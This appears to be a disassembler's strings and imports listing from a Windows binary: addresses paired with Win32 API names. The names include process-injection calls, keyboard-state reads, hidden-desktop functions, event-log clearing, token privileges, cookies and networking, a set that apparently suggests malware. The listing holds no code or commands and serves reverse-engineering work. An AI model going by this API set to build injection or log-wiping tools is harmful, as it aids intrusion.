aCryptexportkey 0041E124
aCryptenumprovi 0041E134 aCryptenumpro_0 0041E148
aCryptenumpro_1 0041E15C
aCryptenumpro_2 0041E174 aCryptencrypt 0041E18C
aCryptduplicate 0041E19C
aCryptduplica_0 0041E1B0 aCryptdestroyke 0041E1C4
aCryptdestroy_0 0041E1D4
aCryptderivekey 0041E1E8 aCryptdecrypt 0041E1F8
aCryptcreateh_0 0041E208
aCryptcontextad 0041E218 aCryptacquire_0 0041E22C
aCryptacquire_1 0041E244 aCreateservicew 0041E25C
aCreateservicea 0041E26C
aCreateproces_0 0041E27C aCreateproces_1 0041E294
aCreateprivateo 0041E2AC
aCopysid 0041E2C8
aConvertsecurit 0041E2D0
aConvertsecur_0 0041E2F4
aConvertsecur_1 0041E31C aConvertsecur_2 0041E344
aConvertaccesst 0041E368
aConvertacces_0 0041E38C aControlservice 0041E3B0
aCloseserviceha 0041E3C0
aCloseeventlog 0041E3D4 aCleareventlogw 0041E3E4
aCleareventloga 0041E3F4
aChangeservicec 0041E404
aFreeenvironmen 00421AB8
aFreeenvironm_0 00421AD0 aFreeconsole 00421AE8
aFormatmessag_0 00421AF4
aFormatmessagea 00421B04 aFoldstringw 00421B14
aFoldstringa 00421B20
aFlushviewoffil 00421B2C aFlushinstructi 00421B3C
aFlushfilebuf_0 00421B54
aFlushconsolein 00421B68 aFindresource_0 00421B80
aFindresourceex 00421B90
aFindresource_1 00421BA0 aFindresourcea 00421BB0
aFindnextfile_0 00421BC0
aFindnextfilea 00421BD0 aFindnextchange 00421BE0
aFindfirstfil_0 00421BFC
aFindfirstfilee 00421C0C
aFindfirstfil_1 00421C20
aFindfirstfilea 00421C34
aFindfirstchang 00421C44 aFindfirstcha_0 00421C64
aFindclosechang 00421C84
aFindclose_0 00421CA0 aFindatomw 00421CAC
aFindatoma 00421CB8
aFillconsoleout 00421CC4 aFillconsoleo_0 00421CE0
aFillconsoleo_1 00421CFC
aFiletimetosyst 00421D18 aFiletimetolo_0 00421D30
aFiletimetodo_0 00421D48
aFatalexit 00421D60 aFatalappexitw 00421D6C
aFatalappexita 00421D7C
aExpandenviro_0 00421D8C aExpandenviro_1 00421DA8
aExitprocess_0 00421DC4
aEscapecommfunc 00421DD0 aErasetape 00421DE4
aEnumtimeformat 00421DF0
aEnumtimeform_0 00421E04 aEnumsystemloca 00421E18
aEnumsystemlo_0 00421E2C
aEnumsystemcode 00421E40 aEnumsystemco_0 00421E58
aEnumresourcety 00421E70
aEnumresource_0 00421E84 aEnumresourcena 00421E98
aEnumresource_1 00421EAC aEnumresourcela 00421EC0
aEnumresource_2 00421ED8
aEnumdateform_0 00421EF0 aEnumdateform_1 00421F04
aEnumdateformat 00421F18
aEnumdateform_2 00421F2C
aEnumcalendarin 00421F40
aEnumcalendar_0 00421F54
aEnumcalendar_1 00421F68 aEnumcalendar_2 00421F7C
aEndupdateresou 00421F90
aEndupdateres_0 00421FA4 aDuplicatehandl 00421FB8
aDosdatetimetof 00421FC8
aDisconnectna_0 00421FE0 aDisablethreadl 00421FF4
aDeviceiocontro 00422010
aDeletefilew_0 00422020
aTounicodeex 0041A818
aTounicode_0 0041A824 aToasciiex 0041A830
aToascii 0041A83C
aTilewindows 0041A844 aTilechildwindo 0041A850
aTabbedtextoutw 0041A864
aTabbedtextouta 0041A874 aSystemparamete 0041A884
aSystemparame_0 0041A89C
aSwitchtothiswi 0041A8B4 aSwitchdesktop 0041A8C8
aSwapmousebutto 0041A8D8
aSubtractrect 0041A8E8 aShowwindowasyn 0041A8F8
aShowwindow 0041A908
aShowscrollbar 0041A914 aHowownedpopups 0041A925
aShowcursor 0041A934
aShowcaret 0041A940
aSetwindowshook 0041A94C
aSetwindowsho_0 0041A95C
aSetwindowsho_1 0041A970 aSetwindowsho_2 0041A984
aSetwindowword 0041A994
aSetwindowtextw 0041A9A4 aSetwindowtexta 0041A9B4
aSetwindowrgn 0041A9C4
aSetwindowpos 0041A9D4 aSetwindowplace 0041A9E4
aSetwindowlongw 0041A9F8
aSetwindowlonga 0041AA08 aSetwindowconte 0041AA18
aSetwineventhoo 0041AA30
aSetuserobjects 0041AA40 aSetuserobjecti 0041AA58
aSetuserobjec_0 0041AA74
aSettimer 0041AA90 aSetthreaddes_0 0041AA9C
aSetsystemcurso 0041AAB0
aSetsyscolors 0041AAC0 aSetshellwindow 0041AAD0
aSetscrollrange 0041AAE0
aEtscrollpos 0041AAF1 aSetscrollinfo 0041AB00
aSetrectempty 0041AB10
aSetrect 0041AB20 aSetpropw 0041AB28
aSetpropa 0041AB34
aSetprocesswi_0 0041AB40 aEtprocessdefau 0041AB59
aSetparent 0041AB70 aSetmessagequeu 0041AB7C
aSetmessageextr 0041AB8C
aSetmenuiteminf 0041ABA0 aEtmenuiteminfo 0041ABB5
aSetmenuitembit 0041ABC8
aSetmenuinfo 0041ABDC
aSetmenudefault 0041ABE8
aSetmenucontext 0041ABFC
aSetmenu 0041AC14 aSetlasterrorex 0041AC1C
aSetkeyboardsta 0041AC2C
aSetforegroundw 0041AC40 aSetfocus 0041AC54
aSetdoubleclick 0041AC60
aSetdlgitemtext 0041AC74 aSetdlgitemte_0 0041AC84
aSetdlgitemint 0041AC94
aSetdeskwallpap 0041ACA4
aChangeservic_0 0041E41C
aCanceloverlapp 0041E434 aBuildtrusteewi 0041E44C
aBuildtrustee_0 0041E464
aBuildtrustee_1 0041E47C aBuildtrustee_2 0041E494
aBuildsecurityd 0041E4AC
aBuildsecurit_0 0041E4C8 aBuildimpersona 0041E4E4
aBuildimperso_0 0041E500
aBuildimperso_1 0041E51C aBuildimperso_2 0041E544
aBuildexplicita 0041E56C
aBuildexplici_0 0041E58C aBackupeventlog 0041E5AC
aBackupeventl_0 0041E5BC
aAreanyaccesses 0041E5CC aAreallaccesses 0041E5E4
aAllocatelocall 0041E5FC
aAllocateandini 0041E614
aAdjusttokenp_0 0041E630
aAdjusttokengro 0041E648
aAddauditaccess 0041E65C aAddace 0041E670
aAddaccessdenie 0041E678
aAddaccessallow 0041E68C aAccesscheckand 0041E6A0
aAccesschecka_0 0041E6BC
aAccesscheck 0041E6D8 aAbortsystemshu 0041E6E4
aAbortsystems_0 0041E6FC
aWvnsprintfw_0 0041E714 aWvnsprintfa_0 0041E720
aWnsprintfw_0 0041E72C
aWnsprintfa_0 0041E738 aUrlunescapew 0041E744
aUrlunescapea 0041E754
aUrlisw 0041E764 aUrlisopaquew 0041E76C
aUrlisopaquea 0041E77C
aUrlisnohistory 0041E78C aUrlisnohisto_0 0041E79C
aUrlisa 0041E7AC
aUrlhashw 0041E7B4 aUrlhasha 0041E7C0
aUrlgetpartw 0041E7CC
aUrlgetparta 0041E7D8 aUrlgetlocation 0041E7E4
aUrlgetlocati_0 0041E7F4
aUrlescapew 0041E804 aUrlescapea 0041E810
aUrlcreatefromp 0041E81C aUrlcreatefro_0 0041E830
aUrlcomparew 0041E844
aUrlcomparea 0041E850 aUrlcombinew 0041E85C
aUrlcombinea 0041E868
aUrlcanonicaliz 0041E874
aUrlcanonical_0 0041E888
aUrlapplyscheme 0041E89C
aUrlapplysche_0 0041E8AC aStrtrimw 0041E8BC
aStrtrima 0041E8C8
aStrtointw 0041E8D4 aStrtointexw 0041E8E0
aStrtointexa 0041E8EC
aStrtointa 0041E8F8 aStrstrw_0 0041E904
aStrstriw 0041E90C
aStrstria_0 0041E918
aDeletefilea 0042202C
aDeletefiber 00422038 aDeleteatom 00422044
aDefinedosdevic 00422050
aDefinedosdev_0 00422064 aDebugbreak 00422078
aDebugactivepro 00422084
aCreatewaitable 00422098 aCreatewaitab_0 004220B0
aCreatetoolhe_0 004220C8
aCreatethread_0 004220E4 aCreatetapepart 004220F4
aCreatesemaphor 00422108
aCreatesemaph_0 0042211C aCreateremote_0 00422130
aCreateproces_2 00422144
aCreateproces_3 00422154 aCreatepipe 00422164
aCreatenamedp_0 00422170
aCreatenamedp_1 00422184
aCreatemutexw_0 00422198
aCreatemutexa 004221A8
aCreatemailslot 004221B8 aCreatemailsl_0 004221C8
aCreateiocomple 004221D8
aCreatefilew_0 004221F0 aCreatefilema_0 004221FC
aCreatefilema_1 00422210
aCreatefilea 00422224 aCreatefiber 00422230
aCreateeventw_0 0042223C
aCreateeventa 0042224C aCreatedirect_0 0042225C
aCreatedirect_1 00422270
aCreatedirect_2 00422284 aCreatedirect_3 00422298
aCreateconsoles 004222AC
aCopyfilew_0 004222C8 aCopyfileexw 004222D4
aCopyfileexa 004222E0
aCopyfilea 004222EC aConvertthreadt 004222F8
aConvertdefault 00422310
aContinuedebuge 00422328 aConnectnamed_0 0042233C
aComparestringw 00422350
aComparestringa 00422360 aComparefiletim 00422370
aCommconfigdial 00422380
aCommconfigdi_0 00422394 aClosehandle_0 004223A8
aClearcommerror 004223B4 aClearcommbreak 004223C4
aCancelwaitable 004223D4
aCancelio 004223E8 aCanceldevicewa 004223F4
aCallnamedpipew 00422410
aCallnamedpipea 00422420
aBuildcommdcbw 00422430
aBuildcommdcban 00422440
aBuildcommdcb_0 0042245C aBuildcommdcba 00422478
aBeginupdateres 00422488
aBeginupdater_0 004224A0 aBeep 004224B8
aBackupwrite 004224C0
aBackupseek 004224CC aBackupread 004224D8
aArefileapisans 004224E4
aAllocconsole 004224F4
aSetdebugerrorl 0041ACB8
aSetcursorpos 0041ACCC aSetcursor 0041ACDC
aSetclipboardvi 0041ACE8
aSetclipboardda 0041ACFC aSetclassword 0041AD10
aSetclasslongw 0041AD20
aSetclasslonga 0041AD30 aSetcaretpos 0041AD40
aSetcaretblinkt 0041AD4C
aSetcapture 0041AD60 aSetactivewindo 0041AD6C
aSendnotifymess 0041AD7C
aSendnotifyme_0 0041AD90 aSendmessagew_0 0041ADA4
aSendmessagetim 0041ADB4
aSendmessaget_0 0041ADC8 aSendmessagecal 0041ADDC
aSendmessagec_0 0041ADF4
aSendmessagea 0041AE0C
aSendinput 0041AE1C
aSendimemessage 0041AE28
aSendimemessa_0 0041AE3C aSenddlgitemmes 0041AE50
aSenddlgitemm_0 0041AE64
aScrollwindowex 0041AE78 aScrollwindow 0041AE88
aScrolldc 0041AE98
aScreentoclient 0041AEA4 aReuseddelparam 0041AEB4
aReplymessage 0041AEC4
aRemovepropw 0041AED4 aRemovepropa 0041AEE0
aRemovemenu 0041AEEC
aReleasedc 0041AEF8 aReleasecapture 0041AF04
aRegisterwindow 0041AF14
aRegisterwind_0 0041AF2C aRegisterhotkey 0041AF44
aRegisterdevice 0041AF54
aRegisterdevi_0 0041AF70 aRegisterclipbo 0041AF8C
aRegisterclip_0 0041AFA8
aRegisterclassw 0041AFC4 aRegisterclasse 0041AFD4
aRegisterclas_0 0041AFE8
aRegisterclassa 0041AFFC aRedrawwindow 0041B00C
aRealgetwindowc 0041B01C
aRealchildwindo 0041B030 aPtinrect 0041B04C
aPostthreadmess 0041B058 aPostthreadme_0 0041B06C
aStrstra 0041E924
aStrspnw 0041E92C aStrspna 0041E934
aStrrettostrw 0041E93C
aStrrettostra 0041E94C aStrrettobufw 0041E95C
aStrrettobufa 0041E96C
aStrrstriw 0041E97C aStrrstria 0041E988
aStrrchrw 0041E994
aStrrchriw 0041E9A0 aStrrchria 0041E9AC
aStrrchra 0041E9B8
aStrpbrkw 0041E9C4 aStrpbrka 0041E9D0
aStrncatw 0041E9DC
aStrncata 0041E9E8 aStrisintlequal 0041E9F4
aStrisintlequ_0 0041EA04
aStrfromtimeint 0041EA14
aStrfromtimei_0 0041EA2C
aStrformatkbsiz 0041EA44
aStrformatkbs_0 0041EA58 aStrformatbytes 0041EA6C
aStrformatbyt_0 0041EA80
aStrformatbyt_1 0041EA94 aStrdupw 0041EAAC
aStrdupa 0041EAB4
aStrcpyw 0041EABC aStrcpynw 0041EAC4
aStrcmpw 0041EAD0
aStrcmpnw 0041EAD8 aStrcmpniw_0 0041EAE4
aStrcmpnia_0 0041EAF0
aStrcmpna 0041EAFC aStrcmpiw 0041EB08
aStrchrw 0041EB14
aStrchriw 0041EB1C aStrchria 0041EB28
aStrchra 0041EB34
aStrcatw 0041EB3C aStrcatbuffw 0041EB44
aStrcatbuffa 0041EB50
aStrcspnw 0041EB5C aStrcspniw 0041EB68
aStrcspnia 0041EB74
aStrcspna 0041EB80 aShstrdupw 0041EB8C
aShstrdupa 0041EB98
aShskipjunction 0041EBA4 aShsetvaluew 0041EBB4
aShsetvaluea 0041EBC0 aShsetthreadref 0041EBCC
aAddatomw 00422504
aAddatoma 00422510 String1 0042251C
aEntry 00422520
LibFileName 00422528 ProcName 00422538
aDans 0042254C
aRich 00422554 a_text 0042255C
a_rdata 00422564
a_data 0042256C aWritefile_1 00428776
aReadfile_1 00428782
aCreatefilew_1 0042878C aOpenmutexw_1 0042879A
aSetnamedpipe_1 004287A6
aHeaprealloc_0 004287C0 aMultibytetow_1 0042885C
aGetfilesizee_0 00428872
aCreatefilema_2 00428882
aSetfileattri_2 00428896
aCreatethread_1 004288AA
aClosehandle_1 004288B8 aSleep_1 004288C6
aGetmodulehan_2 004288CE
aLoadlibrarya_1 004288E0 aGetprocaddre_1 004288EE
aGetmodulefil_4 004288FE
aExitprocess_1 00428912 aLstrcmpia_1 00428920
aLstrcpyw_1 0042892C
aWidechartomu_1 00428936 aDeletefilew_1 0042894C
aCrypthashdat_1 0042895A
aCryptdestroy_1 0042896A aCryptcreateh_1 0042897C
aCryptgethash_1 0042898E
aCryptrelease_1 004289A2 aCryptacquire_2 004289B8
aGetsavefilenam 004289CE
aGetopenfilenam 004289E0 aOleinitializ_0 004289F2
aPathremovefi_2 00428A2C
aPathfindfile_2 00428A60 aPathcombinew_1 00428A74
aGetwindowtex_2 00428A82
aMessageboxw_0 00428A98 aCreatedialog_2 00428AFC
aGetdlgitem_1 00428B10
aSetwindowlon_0 00428B1C aGetdlgitemte_3 00428B2C
aS 00429028
Comment Strings:
.text:0041D678 00000018 C ObjectDeleteAuditAlarmW
.text:0041D690 00000018 C ObjectDeleteAuditAlarmA
.text:0041D6A8 00000017 C ObjectCloseAuditAlarmW
.text:0041D6C0 00000017 C ObjectCloseAuditAlarmA
.text:0041D6D8 00000015 C NotifyChangeEventLog
.text:0041D6F0 00000017 C NotifyBootConfigStatus
.text:0040581C 0000000B C GetDlgItem
.text:00405828 0000000C C GetIconInfo
.text:00405834 00000009 C DrawIcon
.text:00405840 0000000D C GetCursorPos
.text:00405850 0000000C C LoadCursorW
.text:0040585C 00000011 C SetThreadDesktop
.text:00405870 0000000D C CloseDesktop
.text:00405880 0000000D C OpenDesktopA
.text:00405890 00000018 C SetProcessWindowStation
.text:004058A8 00000013 C CloseWindowStation
.text:004058BC 00000013 C OpenWindowStationA
.text:004058D0 00000014 C GetForegroundWindow
.text:004058E4 00000019 C GetWindowThreadProcessId
.text:00405900 00000011 C DispatchMessageW
.text:00405914 0000001A C MsgWaitForMultipleObjects
.text:00405930 00000011 C GetKeyboardState
.text:00405944 0000000A C ToUnicode
.text:00405950 0000000C C GetKeyState
.text:0040595C 00000011 C DispatchMessageA
.text:00405970 0000000D C PeekMessageW
.text:00405980 0000000F C CharLowerBuffA
.text:00405990 0000000E C ExitWindowsEx
.text:004059A0 0000000B C CharToOemW
.text:004059AC 0000000B C CharUpperW
.text:004059B8 00000010 C WSAGetLastError
.text:004059C8 00000010 C WSASetLastError
.text:004059D8 00000007 C select
.text:004059E0 00000009 C WSAIoctl
.text:004059EC 00000005 C recv
.text:004059F4 00000009 C recvfrom
.text:00405A00 0000000C C getsockname
.text:00405A0C 0000000D C freeaddrinfo
.text:00405A1C 0000000C C getaddrinfo
.text:00405A28 00000009 C shutdown
.text:00405A34 0000000B C WSACleanup
.text:00405A40 0000000B C WSAStartup
.text:00405A4C 00000007 C accept
.text:00405A54 00000007 C listen
.text:00405A5C 00000005 C bind
.text:00405A64 00000007 C socket
.text:00405A6C 0000000C C getpeername
.text:00405A78 00000007 C sendto
.text:00405A80 0000000A C WSASendTo
.text:00405A8C 00000008 C WSASend
.text:00405A94 00000014 C CryptReleaseContext
.text:00405AA8 00000011 C CryptDestroyHash
.text:00405ABC 00000012 C CryptGetHashParam
.text:00405AD0 0000000E C CryptHashData
.text:00405AE0 00000010 C CryptCreateHash
.text:00405AF0 00000015 C CryptAcquireContextW
.text:00405B08 00000011 C DuplicateTokenEx
.text:00405B1C 00000015 C CreateProcessAsUserW
.text:00405B34 0000001A C SetSecurityDescriptorDacl
.text:00405B50 0000001D C InitializeSecurityDescriptor
.text:00405B70 0000000E C RegEnumKeyExW
.text:00405B80 00000010 C RegDeleteValueW
.text:00405B90 0000000F C RegSetValueExA
.text:00405BA0 0000000F C RegSetValueExW
.text:00405BB0 0000000C C RegCloseKey
.text:00405BBC 0000000E C RegOpenKeyExW
.text:00405BCC 00000010 C RegCreateKeyExA
.text:00405BDC 00000010 C RegCreateKeyExW
.text:00405BEC 00000011 C RegQueryValueExW
.text:00405C00 00000012 C LookupAccountSidW
.text:00405C14 00000014 C GetTokenInformation
.text:00405C28 00000011 C OpenProcessToken
.text:00405C3C 00000016 C AdjustTokenPrivileges
.text:00405C54 00000016 C LookupPrivilegeValueW
.text:00405C6C 0000000D C GetUserNameW
.text:00405C7C 00000015 C DeleteUrlCacheEntryW
.text:0041D708 0000000F C MapGenericMask
.text:0041D718 00000013 C MakeSelfRelativeSD
.text:0041D72C 0000000F C MakeAbsoluteSD
.text:0041D73C 0000001F C LookupSecurityDescriptorPartsW
.text:0041D75C 0000001F C LookupSecurityDescriptorPartsA
.text:0041D77C 00000016 C LookupPrivilegeValueW
.text:0041D794 00000016 C LookupPrivilegeValueA
.text:0041D7AC 00000015 C LookupPrivilegeNameW
.text:0041D7C4 00000015 C LookupPrivilegeNameA
.text:0041D7DC 0000001C C LookupPrivilegeDisplayNameW
.text:0041D7F8 0000001C C LookupPrivilegeDisplayNameA
.text:0041D814 00000012 C LookupAccountSidW
.text:0041D828 00000012 C LookupAccountSidA
.text:0041D83C 00000013 C LookupAccountNameW
.text:0041D850 00000013 C LookupAccountNameA
.text:0041D864 0000000B C LogonUserW
.text:0041D870 0000000B C LogonUserA
.text:0041D87C 00000014 C LockServiceDatabase
.text:0041D890 0000000B C IsValidSid
.text:0041D89C 0000001A C IsValidSecurityDescriptor
.text:0041D8B8 0000000B C IsValidAcl
.text:0041D8C4 0000000E C IsTextUnicode
.text:0041D8D4 00000018 C InitiateSystemShutdownW
.text:0041D8EC 00000018 C InitiateSystemShutdownA
.text:0041D904 0000000E C InitializeSid
.text:0041D914 0000001D C InitializeSecurityDescriptor
.text:0041D934 0000000E C InitializeAcl
.text:0041D944 00000010 C ImpersonateSelf
.text:0041D954 0000001B C ImpersonateNamedPipeClient
.text:0041D970 00000018 C ImpersonateLoggedOnUser
.text:0041D988 0000000D C GetUserNameW
.text:0041D998 0000000D C GetUserNameA
.text:0041D9A8 00000010 C GetTrusteeTypeW
.text:0041D9B8 00000010 C GetTrusteeTypeA
.text:0041D9C8 00000010 C GetTrusteeNameW
.text:0041D9D8 00000010 C GetTrusteeNameA
.text:0041D9E8 00000014 C GetTokenInformation
.text:0041D9FC 00000018 C GetSidSubAuthorityCount
.text:0041DA14 00000013 C GetSidSubAuthority
.text:0041DA28 00000015 C GetSidLengthRequired
.text:0041DA40 0000001A C GetSidIdentifierAuthority
.text:0041DA5C 00000013 C GetServiceKeyNameW
.text:0041DA70 00000013 C GetServiceKeyNameA
.text:0041DA84 00000017 C GetServiceDisplayNameW
.text:0041DA9C 00000017 C GetServiceDisplayNameA
.text:0041DAB4 00000013 C GetSecurityInfoExW
.text:0041DAC8 00000013 C GetSecurityInfoExA
.text:0041DADC 00000010 C GetSecurityInfo
.text:0041DAEC 0000001A C GetSecurityDescriptorSacl
.text:0041DB08 0000001B C GetSecurityDescriptorOwner
.text:0041DB24 0000001C C GetSecurityDescriptorLength
.text:0041DB40 0000001B C GetSecurityDescriptorGroup
.text:0041DB5C 0000001A C GetSecurityDescriptorDacl
.text:0041DB78 0000001D C GetSecurityDescriptorControl
.text:0041DB98 00000019 C GetPrivateObjectSecurity
.text:0041DBB4 0000001B C GetOverlappedAccessResults
.text:0041DBD0 00000018 C GetOldestEventLogRecord
.text:0041DBE8 0000001B C GetNumberOfEventLogRecords
.text:0041DC04 00000016 C GetNamedSecurityInfoW
.text:0041DC1C 00000018 C GetNamedSecurityInfoExW
.text:0041DC34 00000018 C GetNamedSecurityInfoExA
.text:0041DC4C 00000016 C GetNamedSecurityInfoA
.text:0041DC64 00000014 C GetMultipleTrusteeW
.text:0041DC78 0000001D C GetMultipleTrusteeOperationW
.text:0041DC98 0000001D C GetMultipleTrusteeOperationA
.text:0041DCB8 00000014 C GetMultipleTrusteeA
.text:0041DCCC 0000000D C GetLengthSid
.text:0041DCDC 00000018 C GetKernelObjectSecurity
.text:0041DCF4 00000011 C GetFileSecurityW
.text:0041DD08 00000011 C GetFileSecurityA
.text:00405C94 00000012 C FindCloseUrlCache
.text:00405CA8 00000017 C FindNextUrlCacheEntryW
.text:00405CC0 00000018 C FindFirstUrlCacheEntryW
.text:00405CD8 00000013 C InternetSetOptionA
.text:00405CEC 0000001A C InternetSetStatusCallback
.text:00405D08 00000016 C GetUrlCacheEntryInfoW
.text:00405D20 00000017 C HttpAddRequestHeadersA
.text:00405D38 00000017 C HttpAddRequestHeadersW
.text:00405D50 00000015 C InternetQueryOptionA
.text:00405D68 00000019 C InternetCheckConnectionA
.text:00405D84 00000012 C InternetCrackUrlA
.text:00405D98 00000011 C HttpOpenRequestA
.text:00405DAC 00000011 C InternetConnectA
.text:00405DC0 00000011 C InternetOpenUrlA
.text:00405DD4 0000000E C InternetOpenA
.text:00405DE4 00000013 C InternetGetCookieA
.text:00405DF8 00000015 C GetModuleFileNameExW
.text:00405E10 0000000D C SHDeleteKeyA
.text:00405E20 0000000F C PathMatchSpecW
.text:00405E30 00000014 C PathRemoveFileSpecW
.text:00405E44 00000010 C PathFileExistsW
.text:00405E54 0000000E C PathSkipRootW
.text:00405E64 00000015 C PathRemoveBackslashW
.text:00405E7C 00000012 C PathAddExtensionW
.text:00405E90 00000012 C PathAddBackslashW
.text:00405EA4 00000012 C PathFindFileNameW
.text:00405EB8 0000000D C PathCombineW
.text:00405EC8 0000000B C wnsprintfA
.text:00405ED4 0000000B C wnsprintfW
.text:00405EE0 0000000C C wvnsprintfA
.text:00405EEC 0000000C C wvnsprintfW
.text:00405EF8 0000000A C StrCmpNIW
.text:00405F04 0000000A C StrCmpNIA
.text:00405F10 00000009 C StrStrIA
.text:00405F1C 00000008 C StrStrW
.text:00405F24 00000014 C RtlCreateUserThread
.text:00405F38 00000010 C LdrGetDllHandle
.text:00405F48 0000001A C NtQueryInformationProcess
.text:00405F64 0000000D C NtCreateFile
.text:00405F74 0000000E C NtQueryObject
.text:00405F84 0000000E C ShellExecuteW
.text:00405F94 00000011 C SHGetFolderPathW
.text:00405FA8 00000018 C SHGetSpecialFolderPathW
.text:00405FC0 0000000E C FindResourceW
.text:00405FD0 0000001A C ExpandEnvironmentStringsW
.text:00405FEC 0000000D C GlobalUnlock
.text:00405FFC 0000000B C GlobalLock
.text:00406008 0000000C C GetFileTime
.text:00406014 0000000C C SetFileTime
.text:00406020 00000011 C GetComputerNameW
.text:00406034 0000000A C FindClose
.text:00406040 0000000E C FindNextFileW
.text:00406050 0000000F C FindFirstFileW
.text:00406060 00000011 C GetTempFileNameW
.text:00406074 00000015 C SystemTimeToFileTime
.text:0040608C 0000000E C GetSystemTime
.text:0040609C 00000015 C LeaveCriticalSection
.text:004060B4 00000015 C EnterCriticalSection
.text:004060CC 0000001A C InitializeCriticalSection
.text:004060E8 00000012 C ReadProcessMemory
.text:004060FC 0000000D C SetLastError
.text:0040610C 0000000E C IsBadWritePtr
.text:0040611C 0000000D C IsBadReadPtr
.text:0040612C 0000000D C GetTempPathW
.text:0040613C 00000011 C CreateDirectoryW
.text:00406150 0000000C C MoveFileExW
.text:0040615C 00000014 C WideCharToMultiByte
.text:00406170 00000014 C MultiByteToWideChar
.text:00406184 00000010 C GetProcessTimes
.text:00406194 0000000F C CreateProcessW
.text:0041DD1C 0000001B C GetExplicitEntriesFromAclW
.text:0041DD38 0000001B C GetExplicitEntriesFromAclA
.text:0041DD54 0000001B C GetEffectiveRightsFromAclW
.text:0041DD70 0000001B C GetEffectiveRightsFromAclA
.text:0041DD8C 00000015 C GetCurrentHwProfileW
.text:0041DDA4 00000015 C GetCurrentHwProfileA
.text:0041DDBC 0000001E C GetAuditedPermissionsFromAclW
.text:0041DDDC 0000001E C GetAuditedPermissionsFromAclA
.text:0041DDFC 00000012 C GetAclInformation
.text:0041DE10 00000007 C GetAce
.text:0041DE18 0000001F C GetAccessPermissionsForObjectW
.text:0041DE38 0000001F C GetAccessPermissionsForObjectA
.text:0041DE58 00000008 C FreeSid
.text:0041DE60 00000011 C FindFirstFreeAce
.text:0041DE74 00000009 C EqualSid
.text:0041DE80 0000000F C EqualPrefixSid
.text:0041DE90 00000014 C EnumServicesStatusW
.text:0041DEA4 00000014 C EnumServicesStatusA
.text:0041DEB8 00000017 C EnumDependentServicesW
.text:0041DED0 00000017 C EnumDependentServicesA
.text:0041DEE8 00000011 C DuplicateTokenEx
.text:0041DEFC 0000000F C DuplicateToken
.text:0041DF0C 0000001D C DestroyPrivateObjectSecurity
.text:0041DF2C 00000016 C DeregisterEventSource
.text:0041DF44 0000000E C DeleteService
.text:0041DF54 0000000A C DeleteAce
.text:0041DF60 00000016 C CryptVerifySignatureW
.text:0041DF78 00000016 C CryptVerifySignatureA
.text:0041DF90 0000000F C CryptSignHashW
.text:0041DFA0 0000000F C CryptSignHashA
.text:0041DFB0 00000012 C CryptSetProviderW
.text:0041DFC4 00000014 C CryptSetProviderExW
.text:0041DFD8 00000014 C CryptSetProviderExA
.text:0041DFEC 00000012 C CryptSetProviderA
.text:0041E000 00000012 C CryptSetProvParam
.text:0041E014 00000011 C CryptSetKeyParam
.text:0041E028 00000012 C CryptSetHashParam
.text:0041E03C 00000014 C CryptReleaseContext
.text:0041E050 0000000F C CryptImportKey
.text:0041E060 00000014 C CryptHashSessionKey
.text:0041E074 0000000E C CryptHashData
.text:0041E084 00000010 C CryptGetUserKey
.text:0041E094 00000012 C CryptGetProvParam
.text:0041E0A8 00000011 C CryptGetKeyParam
.text:0041E0BC 00000012 C CryptGetHashParam
.text:0041E0D0 00000019 C CryptGetDefaultProviderW
.text:0041E0EC 00000019 C CryptGetDefaultProviderA
.text:0041E108 0000000F C CryptGenRandom
.text:0041E118 0000000C C CryptGenKey
.text:0041E124 0000000F C CryptExportKey
.text:0041E134 00000014 C CryptEnumProvidersW
.text:0041E148 00000014 C CryptEnumProvidersA
.text:0041E15C 00000018 C CryptEnumProviderTypesW
.text:0041E174 00000018 C CryptEnumProviderTypesA
.text:0041E18C 0000000D C CryptEncrypt
.text:0041E19C 00000012 C CryptDuplicateKey
.text:0041E1B0 00000013 C CryptDuplicateHash
.text:0041E1C4 00000010 C CryptDestroyKey
.text:0041E1D4 00000011 C CryptDestroyHash
.text:0041E1E8 0000000F C CryptDeriveKey
.text:0041E1F8 0000000D C CryptDecrypt
.text:0041E208 00000010 C CryptCreateHash
.text:0041E218 00000013 C CryptContextAddRef
.text:0041E22C 00000015 C CryptAcquireContextW
.text:0041E244 00000015 C CryptAcquireContextA
.text:0041E25C 0000000F C CreateServiceW
.text:0041E26C 0000000F C CreateServiceA
.text:0041E27C 00000015 C CreateProcessAsUserW
.text:0041E294 00000015 C CreateProcessAsUserA
.text:0041E2AC 0000001C C CreatePrivateObjectSecurity
.text:004061A4 00000013 C GetCurrentThreadId
.text:004061B8 00000011 C GetCurrentThread
.text:004061CC 00000012 C GetThreadPriority
.text:004061E0 00000012 C SetThreadPriority
.text:004061F4 00000014 C GetCurrentProcessId
.text:00406208 0000000E C VirtualFreeEx
.text:00406218 00000011 C VirtualProtectEx
.text:0040622C 0000000F C VirtualAllocEx
.text:0040623C 0000000F C VirtualQueryEx
.text:0040624C 0000000C C OpenProcess
.text:00406258 0000000C C ExitProcess
.text:00406264 0000000B C ExitThread
.text:00406270 00000013 C GetExitCodeProcess
.text:00406284 0000000D C Thread32Next
.text:00406294 0000000E C Thread32First
.text:004062A4 0000000E C Module32NextW
.text:004062B4 0000000F C Module32FirstW
.text:004062C4 0000000F C Process32NextW
.text:004062D4 00000010 C Process32FirstW
.text:004062E4 00000019 C CreateToolhelp32Snapshot
.text:00406300 00000013 C CreateRemoteThread
.text:00406314 0000000D C CreateThread
.text:00406324 00000013 C WriteProcessMemory
.text:00406338 00000014 C DisconnectNamedPipe
.text:0040634C 0000000D C GetLocalTime
.text:0040635C 00000011 C FlushFileBuffers
.text:00406370 0000000C C GetFileSize
.text:0040637C 0000000D C SetEndOfFile
.text:0040638C 00000009 C ReadFile
.text:00406398 0000000A C WriteFile
.text:004063A4 0000000D C GetTickCount
.text:004063B4 00000011 C CreateNamedPipeW
.text:004063C8 00000018 C SetNamedPipeHandleState
.text:004063E0 0000000F C WaitNamedPipeW
.text:004063F0 00000011 C ConnectNamedPipe
.text:00406404 00000009 C HeapFree
.text:00406410 0000000C C HeapReAlloc
.text:0040641C 0000000A C HeapAlloc
.text:00406428 0000000C C HeapDestroy
.text:00406434 0000000B C HeapCreate
.text:00406440 0000000F C SetFilePointer
.text:00406450 0000000D C CreateEventW
.text:00406460 0000000C C CreateFileW
.text:0040646C 00000009 C SetEvent
.text:00406478 00000014 C WaitForSingleObject
.text:0040648C 00000013 C SetFileAttributesW
.text:004064A0 0000000C C DeleteFileW
.text:004064AC 0000000C C CloseHandle
.text:004064B8 00000009 C lstrcatA
.text:004064C4 00000009 C lstrcatW
.text:004064D0 00000009 C lstrcpyA
